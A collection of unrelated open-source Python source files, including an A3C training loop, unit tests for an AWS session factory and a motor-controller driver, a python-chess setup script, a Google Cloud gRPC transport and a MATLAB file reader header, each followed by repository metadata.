episode_step_count += 1
# running training step at the end of episode
if (len(episode_buffer) == self.config.STEPS_FOR_UPDATE) or d or\
(episode_step_count == self.config.MAX_EPISODE_LENGTH):
if d:
v1 = 0.0 # episode finished, no bootstrapping needed
else:
# bootstrap value from the last step for return calculation
feed_dict_v = {self.local_AC.inputs: [s],
self.local_AC.state_in[0]: rnn_state[0],
self.local_AC.state_in[1]: rnn_state[1]}
if self.config.GOAL_ON:
feed_dict_v.update({self.local_AC.direction_input: goal_direction})
if self.config.ACCELERATION_ACTIONS:
feed_dict_v.update({self.local_AC.velocity_state: velocity_state})
if self.config.PREV_ACTION_ON:
feed_dict_v.update({self.local_AC.prev_action: previous_action})
if self.config.PREV_REWARD_ON:
feed_dict_v.update({self.local_AC.prev_reward: previous_reward})
v1 = sess.run(self.local_AC.value,
feed_dict=feed_dict_v)
v_l, p_l, e_l, g_n, v_n, depth_l = self.train(episode_buffer, v1, self.config.GAMMA, self.config.LAMBDA, sess)
episode_buffer = []
sess.run(self.update_local_ops)
if d or (episode_step_count == self.config.MAX_EPISODE_LENGTH):
break
# Summary writing, model saving, etc.
self.episode_rewards.append(episode_reward)
self.episode_lengths.append(episode_step_count)
self.episode_mean_values.append(np.mean(episode_values))
steps_since_log = self.local_steps - self.last_log_writing_steps
if steps_since_log > self.config.LOGGING_PERIOD:
mean_reward = np.mean(self.episode_rewards[-5:])
mean_length = np.mean(self.episode_lengths[-5:])
mean_value = np.mean(self.episode_mean_values[-5:])
summary = tf.Summary()
summary.value.add(tag='Perf/Reward', simple_value=float(mean_reward))
summary.value.add(tag='Perf/Length', simple_value=float(mean_length))
summary.value.add(tag='Perf/Value', simple_value=float(mean_value))
summary.value.add(tag='Losses/Value Loss', simple_value=float(v_l))
summary.value.add(tag='Losses/Policy Loss', simple_value=float(p_l))
summary.value.add(tag='Losses/Entropy', simple_value=float(e_l))
summary.value.add(tag='Losses/Grad Norm', simple_value=float(g_n))
summary.value.add(tag='Var Norm', simple_value=float(v_n))
summary.value.add(tag='Losses/Depth Loss', simple_value=float(depth_l))
self.summary_writer.add_summary(summary, episode_count)
self.summary_writer.flush()
self.last_log_writing_steps = self.local_steps
current_global_steps = sess.run(self.global_steps)
if self.name == 'worker_0':
steps_since_save = current_global_steps - self.last_model_save_steps
if steps_since_save > self.config.MODEL_SAVE_PERIOD:
print('--- Saving model at {} global steps'.format(current_global_steps))
self.last_model_save_steps = current_global_steps -\
(current_global_steps % self.config.MODEL_SAVE_PERIOD)
saver.save(sess, self.model_path + '/model-' + str(int(self.last_model_save_steps/1000)) + 'k.cptk')
sess.run(self.increment_episodes)
print('--- worker_0 {} episodes, {} global steps'.format(episode_count, current_global_steps))
if current_global_steps > self.config.MAX_STEPS:
coord.request_stop()
episode_count += 1
# shutting down client and sim
print('Shutting down {}... '.format(self.name))
self.env.shut_down()
print(' Sim and client closed.')
class Player:
""" A3C Agent for evaluation. """
def __init__(self, number, config):
self.name = 'player_' + str(number)
print('Initializing {} ...'.format(self.name))
self.config = config
self.number = number
self.local_AC = ACNetwork('player_{}'.format(self.number), None, self.config, 0)
self.update_local_ops = update_target_graph('global', 'player_{}'.format(self.number))
self.env = Commander(self.number, self.config, self.name)
self.actions = self.env.action_space
self.episodes_started = 0
self.episodes_finished = 0
self.steps = 0
self.rnn_state = None
self.s = None
self.stop_requested = False
self.crashes = 0
self.terminations = 0
# remove previous trajectory logs to avoid unintentional appending
ucv_utils.remove_file('./trajectory_{}.yaml'.format(self.name))
print('[{}] initialization done.'.format(self.name))
def play(self, session, coordinator):
with session.as_default(), session.graph.as_default():
session.run(self.update_local_ops) # loading weights
# evaluation loop
while not coordinator.should_stop():
finished_episode = False
self.s = self.env.get_observation()
self.rnn_state = self.local_AC.state_init
self.steps = 0
self.episodes_started += 1
previous_reward = np.expand_dims(np.expand_dims(0.0, 0), 0) # np.zeros([1, 1], dtype=float)
previous_action = np.zeros([1, self.config.ACTIONS], dtype=np.float32)
if self.config.ACCELERATION_ACTIONS:
velocity_state = self.env.get_velocity_state()
# episode loop
while not finished_episode:
feed_dict = {self.local_AC.inputs: [self.env.get_observation()],
self.local_AC.state_in[0]: self.local_AC.state_init[0],
self.local_AC.state_in[1]: self.local_AC.state_init[1]}
if self.config.GOAL_ON:
goal_direction = self.env.get_goal_direction()
feed_dict.update({self.local_AC.direction_input: goal_direction})
if self.config.PREV_ACTION_ON:
feed_dict.update({self.local_AC.prev_action: previous_action})
if self.config.PREV_REWARD_ON:
feed_dict.update({self.local_AC.prev_reward: previous_reward})
if self.config.ACCELERATION_ACTIONS:
feed_dict.update({self.local_AC.velocity_state: velocity_state})
if self.config.AUX_TASK_D2:
# no training, no need for depth images
# self.env.get_observation(viewmode='depth')
pass
# running inference on network, action selection
a_dist, self.rnn_state = session.run([self.local_AC.policy, self.local_AC.state_out], feed_dict=feed_dict)
if self.config.STOCHASTIC_POLICY_EVAL:
a = np.random.choice(a_dist[0], p=a_dist[0])
a = np.argmax(np.equal(a_dist, a))
else:
a = np.argmax(a_dist)
reward = self.env.action(self.actions[a])
self.steps += 1
previous_action = np.expand_dims(np.eye(self.config.ACTIONS)[a][:], 0) # onehot previous action
previous_reward = np.expand_dims(np.expand_dims(reward, 0), 0)
if self.steps > self.config.MAX_EVALUATION_EPISODE_LENGTH:
self.env.new_episode(save_trajectory=True)
self.terminations += 1
finished_episode = True
if self.env.is_episode_finished():
self.env.new_episode(save_trajectory=True)
self.crashes += 1
finished_episode = True
self.episodes_finished += 1
self.env.shut_down()
|
mkisantal/ucv-control
|
network.py
|
Python
|
mit
| 26,027
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import boto3
import pretend
import pytest
from warehouse import aws
@pytest.mark.parametrize("region", [None, "us-west-2"])
def test_aws_session_factory(monkeypatch, region):
boto_session_obj = pretend.stub()
boto_session_cls = pretend.call_recorder(lambda **kw: boto_session_obj)
monkeypatch.setattr(boto3.session, "Session", boto_session_cls)
request = pretend.stub(
registry=pretend.stub(
settings={"aws.key_id": "my key", "aws.secret_key": "my secret"}
)
)
if region is not None:
request.registry.settings["aws.region"] = region
assert aws.aws_session_factory(None, request) is boto_session_obj
assert boto_session_cls.calls == [
pretend.call(
aws_access_key_id="my key",
aws_secret_access_key="my secret",
**({} if region is None else {"region_name": region})
)
]
def test_includeme():
config = pretend.stub(
register_service_factory=pretend.call_recorder(lambda factory, name: None)
)
aws.includeme(config)
assert config.register_service_factory.calls == [
pretend.call(aws.aws_session_factory, name="aws.session")
]
|
pypa/warehouse
|
tests/unit/test_aws.py
|
Python
|
apache-2.0
| 1,734
|
# -*- coding: utf-8 -*-
'''
Created on 27 Jan 2015 (based on tmcm_test.py)
@author: Éric Piel
Copyright © 2014-2015 Éric Piel, Delmic
This file is part of Odemis.
Odemis is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation.
Odemis is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with Odemis. If not, see http://www.gnu.org/licenses/.
'''
from __future__ import division
from concurrent import futures
import logging
import math
from odemis.driver import nfpm
import os
import time
import unittest
from unittest.case import skip
logging.getLogger().setLevel(logging.DEBUG)
# Export TEST_NOHW=1 to force using only the simulator and skipping test cases
# needing real hardware
TEST_NOHW = (os.environ.get("TEST_NOHW", 0) != 0) # Default to Hw testing
CLASS = nfpm.PM8742
KWARGS = dict(name="test", role="fiber-align", address="autoip",
axes=["x", "y"],
stepsize=[33.e-9, 33.e-9],
inverted=["x"])
KWARGS_SIM = dict(KWARGS)
KWARGS_SIM["address"] = "fake"
if TEST_NOHW:
KWARGS = KWARGS_SIM
# @skip("faster")
class TestStatic(unittest.TestCase):
"""
Tests which don't need a component ready
"""
def test_scan(self):
"""
Check that we can do a scan network. It can pass only if we are
connected to at least one controller.
"""
devices = CLASS.scan()
if not TEST_NOHW:
self.assertGreater(len(devices), 0)
for name, kwargs in devices:
print "opening", name
stage = CLASS(name, "stage", **kwargs)
self.assertTrue(stage.selfTest(), "Controller self test failed.")
def test_fake(self):
"""
Just makes sure we don't (completely) break the simulator after an update
"""
dev = CLASS(**KWARGS_SIM)
self.assertGreater(len(dev.axes), 0)
for axis in dev.axes:
dev.moveAbs({axis:-0.1e-6})
self.assertTrue(dev.selfTest(), "self test failed.")
dev.terminate()
# @skip("faster")
class TestActuator(unittest.TestCase):
def setUp(self):
self.dev = CLASS(**KWARGS)
self.orig_pos = dict(self.dev.position.value)
def tearDown(self):
time.sleep(1)
# move back to the original position
f = self.dev.moveAbs(self.orig_pos)
f.result()
self.dev.terminate()
# @skip("faster")
def test_simple(self):
move = {'x': 0.1e-6}
self.dev.moveRel(move)
time.sleep(0.1) # wait for the move to finish
self.assertAlmostEqual(move["x"], self.dev.position.value["x"])
def test_sync(self):
# For moves big enough, sync should always take more time than async
delta = 0.0001 # s
move = {'x':100e-6}
start = time.time()
f = self.dev.moveRel(move)
dur_async = time.time() - start
f.result()
self.assertTrue(f.done())
move = {'x':-100e-6}
start = time.time()
f = self.dev.moveRel(move)
f.result() # wait
dur_sync = time.time() - start
self.assertTrue(f.done())
self.assertGreater(dur_sync, max(0, dur_async - delta), "Sync should take more time than async.")
move = {'x':0.1e-3}
f = self.dev.moveRel(move)
# timeout = 0.001s should be too short for such a long move
self.assertRaises(futures.TimeoutError, f.result, timeout=0.001)
f.cancel()
def test_linear_pos(self):
"""
Check that the position reported during a move is always increasing
(or decreasing, depending on the direction)
"""
move = {'x': 1e-3}
self.prev_pos = self.dev.position.value
self.direction = 1
self.dev.position.subscribe(self.pos_listener)
f = self.dev.moveRel(move)
f.result() # wait
time.sleep(0.1) # make sure the listener has also received the info
# same, in the opposite direction
move = {'x':-1e-3}
self.direction = -1
f = self.dev.moveRel(move)
f.result() # wait
self.dev.position.unsubscribe(self.pos_listener)
def pos_listener(self, pos):
diff_pos = pos["x"] - self.prev_pos["x"]
if diff_pos == 0:
return # no update/change on X
self.prev_pos = pos
# TODO: on closed-loop axis it's actually possible to go very slightly
# back (at the end, in case of overshoot)
self.assertGreater(diff_pos * self.direction, -20e-6) # negative means opposite dir
def test_stop(self):
self.dev.stop()
move = {'y':100e-6}
f = self.dev.moveRel(move)
self.assertTrue(f.cancel())
self.assertTrue(f.cancelled())
# Try similar but with stop (should cancel every futures)
move = {'y':-100e-6}
f = self.dev.moveRel(move)
self.dev.stop()
time.sleep(0.01)
self.assertTrue(f.cancelled())
def test_queue(self):
# long moves
move_forth = {'x': 0.1e-3}
move_back = {'x':-0.1e-3}
start = time.time()
expected_time = 4 * move_forth["x"] / self.dev.speed.value["x"]
f0 = self.dev.moveRel(move_forth)
f1 = self.dev.moveRel(move_back)
f2 = self.dev.moveRel(move_forth)
f3 = self.dev.moveRel(move_back)
# intentionally skip some sync (it _should_ not matter)
# f0.result()
f1.result()
# f2.result()
f3.result()
dur = time.time() - start
self.assertGreaterEqual(dur, expected_time)
def test_cancel(self):
# long moves
move_forth = {'x': 0.1e-3}
move_back = {'x':-0.1e-3}
# test cancel during action
f = self.dev.moveRel(move_forth)
time.sleep(0.01) # to make sure the action is being handled
self.assertTrue(f.running())
f.cancel()
self.assertTrue(f.cancelled())
self.assertTrue(f.done())
# test cancel in queue
f1 = self.dev.moveRel(move_forth)
f2 = self.dev.moveRel(move_back)
f2.cancel()
self.assertFalse(f1.done())
self.assertTrue(f2.cancelled())
self.assertTrue(f2.done())
# test cancel after already cancelled
f.cancel()
self.assertTrue(f.cancelled())
self.assertTrue(f.done())
f1.result() # wait for the move to be finished
def test_not_cancel(self):
small_move_forth = {'x': 10e-6}
exp_time = small_move_forth["x"] / self.dev.speed.value["x"]
# test cancel after done => not cancelled
f = self.dev.moveRel(small_move_forth)
time.sleep(exp_time * 2 + 0.1)
self.assertFalse(f.running())
f.cancel()
self.assertFalse(f.cancelled())
self.assertTrue(f.done())
# test cancel after result()
f = self.dev.moveRel(small_move_forth)
f.result()
f.cancel()
self.assertFalse(f.cancelled())
self.assertTrue(f.done())
# test not cancelled
f = self.dev.moveRel(small_move_forth)
f.result()
self.assertFalse(f.cancelled())
self.assertTrue(f.done())
def test_move_circle(self):
radius = 0.1e-3 # m
# each step has to be big enough so that each move is above imprecision
steps = 100
cur_pos = (0, 0)
move = {}
for i in xrange(steps):
next_pos = (radius * math.cos(2 * math.pi * float(i) / steps),
radius * math.sin(2 * math.pi * float(i) / steps))
move['x'] = next_pos[0] - cur_pos[0]
move['y'] = next_pos[1] - cur_pos[1]
print next_pos, move
f = self.dev.moveRel(move)
f.result() # wait
cur_pos = next_pos
def test_future_callback(self):
move_forth = {'x': 10e-6}
move_back = {'x':-10e-6}
# test callback while being executed
self.called = 0
f = self.dev.moveRel(move_forth)
time.sleep(0.0) # give it some time to be scheduled (but not enough to be finished)
f.add_done_callback(self.callback_test_notify)
f.result()
time.sleep(0.01) # make sure the callback had time to be called
self.assertEquals(self.called, 1)
self.assertTrue(f.done())
# test callback while in the queue
self.called = 0
f1 = self.dev.moveRel(move_back)
f2 = self.dev.moveRel(move_forth)
f2.add_done_callback(self.callback_test_notify)
self.assertFalse(f1.done())
f2.result()
self.assertTrue(f1.done())
time.sleep(0.01) # make sure the callback had time to be called
self.assertEquals(self.called, 1)
self.assertTrue(f2.done())
# It should work even if the action is fully done
f2.add_done_callback(self.callback_test_notify2)
self.assertEquals(self.called, 2)
# test callback called after being cancelled
move_forth = {'x': 1e-3}
self.called = 0
f = self.dev.moveRel(move_forth)
time.sleep(0.0)
self.assertTrue(f.cancel()) # Returns false if already over
f.add_done_callback(self.callback_test_notify)
time.sleep(0.01) # make sure the callback had time to be called
self.assertEquals(self.called, 1)
self.assertTrue(f.cancelled())
def callback_test_notify(self, future):
self.assertTrue(future.done())
self.called += 1
# Don't display future with %s or %r as it uses lock, which can deadlock
# with the logging
logging.debug("received done for future %s", id(future))
def callback_test_notify2(self, future):
self.assertTrue(future.done())
self.called += 1
logging.debug("received (2) done for future %s", id(future))
if __name__ == "__main__":
unittest.main()
|
gstiebler/odemis
|
src/odemis/driver/test/nfpm_test.py
|
Python
|
gpl-2.0
| 10,237
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# This file is part of the python-chess library.
# Copyright (C) 2012-2016 Niklas Fiekas <niklas.fiekas@backscattering.de>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import chess
import os
import setuptools
import sys
import platform
def read_description():
"""
Reads the description from README.rst and substitutes mentions of the
latest version with a concrete version number.
"""
description = open(os.path.join(os.path.dirname(__file__), "README.rst")).read()
# Link to the documentation of the specific version.
description = description.replace(
"//python-chess.readthedocs.io/en/latest/",
"//python-chess.readthedocs.io/en/v{0}/".format(chess.__version__))
# Use documentation badge for the specific version.
description = description.replace(
"//readthedocs.org/projects/python-chess/badge/?version=latest",
"//readthedocs.org/projects/python-chess/badge/?version=v{0}".format(chess.__version__))
# Show Travis CI build status of the concrete version.
description = description.replace(
"//travis-ci.org/niklasf/python-chess.svg?branch=master",
"//travis-ci.org/niklasf/python-chess.svg?branch=v{0}".format(chess.__version__))
return description
def dependencies():
deps = []
if sys.version_info < (2, 7):
deps.append("backport_collections")
return deps
def extra_dependencies():
extras = {}
if sys.version_info < (3, 2):
extras["uci"] = ["futures"]
else:
extras["uci"] = []
if platform.python_implementation() == "CPython":
if sys.version_info < (3, 3):
extras["gaviota"] = ["backports.lzma"]
else:
extras["gaviota"] = []
extras["test"] = extras["uci"] + extras.get("gaviota", [])
if sys.version_info < (2, 7):
extras["test"].append("unittest2")
if platform.python_implementation() == "CPython":
extras["test"].append("spur")
return extras
setuptools.setup(
name="python-chess",
version=chess.__version__,
author=chess.__author__,
author_email=chess.__email__,
description=chess.__doc__.replace("\n", " ").strip(),
long_description=read_description(),
license="GPL3",
keywords="chess fen pgn polyglot syzygy gaviota uci",
url="https://github.com/niklasf/python-chess",
packages=["chess"],
test_suite="test",
install_requires=dependencies(),
extras_require=extra_dependencies(),
tests_require=extra_dependencies().get("test"),
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: GNU General Public License (GPL)",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Topic :: Games/Entertainment :: Board Games",
"Topic :: Software Development :: Libraries :: Python Modules",
],
)
|
BradleyConn/brickhack
|
setup.py
|
Python
|
gpl-3.0
| 3,922
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import gapic_v1
from google.api_core import grpc_helpers_async
from google.api_core import operations_v1
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from grpc.experimental import aio # type: ignore
from google.cloud.monitoring_metrics_scope_v1.types import metrics_scope
from google.cloud.monitoring_metrics_scope_v1.types import metrics_scopes
from google.longrunning import operations_pb2 # type: ignore
from .base import MetricsScopesTransport, DEFAULT_CLIENT_INFO
from .grpc import MetricsScopesGrpcTransport
class MetricsScopesGrpcAsyncIOTransport(MetricsScopesTransport):
"""gRPC AsyncIO backend transport for MetricsScopes.
Manages Cloud Monitoring Metrics Scopes, and the monitoring
of Google Cloud projects and AWS accounts.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_grpc_channel: aio.Channel
_stubs: Dict[str, Callable] = {}
@classmethod
def create_channel(
cls,
host: str = "monitoring.googleapis.com",
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs,
) -> aio.Channel:
"""Create and return a gRPC AsyncIO channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
aio.Channel: A gRPC AsyncIO channel object.
"""
return grpc_helpers_async.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs,
)
def __init__(
self,
*,
host: str = "monitoring.googleapis.com",
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
channel: aio.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id=None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
channel (Optional[aio.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for the grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure a mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
self._operations_client: Optional[operations_v1.OperationsAsyncClient] = None
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
# use the credentials which are saved
credentials=self._credentials,
# Set ``credentials_file`` to ``None`` here as
# the credentials that we saved earlier should be used.
credentials_file=None,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@property
def grpc_channel(self) -> aio.Channel:
"""Create the channel designed to connect to this service.
This property caches on the instance; repeated calls return
the same channel.
"""
# Return the channel from cache.
return self._grpc_channel
@property
def operations_client(self) -> operations_v1.OperationsAsyncClient:
"""Create the client designed to process long-running operations.
This property caches on the instance; repeated calls return the same
client.
"""
# Quick check: Only create a new client if we do not already have one.
if self._operations_client is None:
self._operations_client = operations_v1.OperationsAsyncClient(
self.grpc_channel
)
# Return the client from cache.
return self._operations_client
@property
def get_metrics_scope(
self,
) -> Callable[
[metrics_scopes.GetMetricsScopeRequest], Awaitable[metrics_scope.MetricsScope]
]:
r"""Return a callable for the get metrics scope method over gRPC.
Returns a specific ``Metrics Scope``.
Returns:
Callable[[~.GetMetricsScopeRequest],
Awaitable[~.MetricsScope]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "get_metrics_scope" not in self._stubs:
self._stubs["get_metrics_scope"] = self.grpc_channel.unary_unary(
"/google.monitoring.metricsscope.v1.MetricsScopes/GetMetricsScope",
request_serializer=metrics_scopes.GetMetricsScopeRequest.serialize,
response_deserializer=metrics_scope.MetricsScope.deserialize,
)
return self._stubs["get_metrics_scope"]
@property
def list_metrics_scopes_by_monitored_project(
self,
) -> Callable[
[metrics_scopes.ListMetricsScopesByMonitoredProjectRequest],
Awaitable[metrics_scopes.ListMetricsScopesByMonitoredProjectResponse],
]:
r"""Return a callable for the list metrics scopes by
monitored project method over gRPC.
Returns a list of every ``Metrics Scope`` that a specific
``MonitoredProject`` has been added to. The metrics scope
representing the specified monitored project will always be the
first entry in the response.
Returns:
Callable[[~.ListMetricsScopesByMonitoredProjectRequest],
Awaitable[~.ListMetricsScopesByMonitoredProjectResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "list_metrics_scopes_by_monitored_project" not in self._stubs:
self._stubs[
"list_metrics_scopes_by_monitored_project"
] = self.grpc_channel.unary_unary(
"/google.monitoring.metricsscope.v1.MetricsScopes/ListMetricsScopesByMonitoredProject",
request_serializer=metrics_scopes.ListMetricsScopesByMonitoredProjectRequest.serialize,
response_deserializer=metrics_scopes.ListMetricsScopesByMonitoredProjectResponse.deserialize,
)
return self._stubs["list_metrics_scopes_by_monitored_project"]
@property
def create_monitored_project(
self,
) -> Callable[
[metrics_scopes.CreateMonitoredProjectRequest],
Awaitable[operations_pb2.Operation],
]:
r"""Return a callable for the create monitored project method over gRPC.
Adds a ``MonitoredProject`` with the given project ID to the
specified ``Metrics Scope``.
Returns:
Callable[[~.CreateMonitoredProjectRequest],
Awaitable[~.Operation]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "create_monitored_project" not in self._stubs:
self._stubs["create_monitored_project"] = self.grpc_channel.unary_unary(
"/google.monitoring.metricsscope.v1.MetricsScopes/CreateMonitoredProject",
request_serializer=metrics_scopes.CreateMonitoredProjectRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs["create_monitored_project"]
@property
def delete_monitored_project(
self,
) -> Callable[
[metrics_scopes.DeleteMonitoredProjectRequest],
Awaitable[operations_pb2.Operation],
]:
r"""Return a callable for the delete monitored project method over gRPC.
Deletes a ``MonitoredProject`` from the specified
``Metrics Scope``.
Returns:
Callable[[~.DeleteMonitoredProjectRequest],
Awaitable[~.Operation]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "delete_monitored_project" not in self._stubs:
self._stubs["delete_monitored_project"] = self.grpc_channel.unary_unary(
"/google.monitoring.metricsscope.v1.MetricsScopes/DeleteMonitoredProject",
request_serializer=metrics_scopes.DeleteMonitoredProjectRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs["delete_monitored_project"]
def close(self):
return self.grpc_channel.close()
__all__ = ("MetricsScopesGrpcAsyncIOTransport",)
|
googleapis/python-monitoring-metrics-scopes
|
google/cloud/monitoring_metrics_scope_v1/services/metrics_scopes/transports/grpc_asyncio.py
|
Python
|
apache-2.0
| 17,038
|
# Copyright (C) 2013-2014 The python-bitcoinlib developers
# Copyright (C) 2015 The python-altcoinlib developers
#
# This file is part of python-altcoinlib.
#
# It is subject to the license terms in the LICENSE file found in the top-level
# directory of this distribution.
#
# No part of python-altcoinlib, including this file, may be copied, modified,
# propagated, or distributed except according to the terms contained in the
# LICENSE file.
from __future__ import absolute_import, division, print_function, unicode_literals
|
rnicoll/python-altcoinlib
|
altcoin/tests/__init__.py
|
Python
|
lgpl-3.0
| 529
|
''' Classes for read / write of matlab (TM) 5 files
The matfile specification last found here:
http://www.mathworks.com/access/helpdesk/help/pdf_doc/matlab/matfile_format.pdf
(as of December 5 2008)
'''
from __future__ import division, print_function, absolute_import
'''
=================================
Note on functions and mat files
=================================
The document above does not give any hints as to the storage of matlab
function handles, or anonymous function handles. I had therefore to
guess the format of matlab arrays of ``mxFUNCTION_CLASS`` and
``mxOPAQUE_CLASS`` by looking at example mat files.
``mxFUNCTION_CLASS`` stores all types of matlab functions. It seems to
contain a struct matrix with a set pattern of fields. For anonymous
functions, a sub-fields of one of these fields seems to contain the
well-named ``mxOPAQUE_CLASS``. This seems to cotain:
* array flags as for any matlab matrix
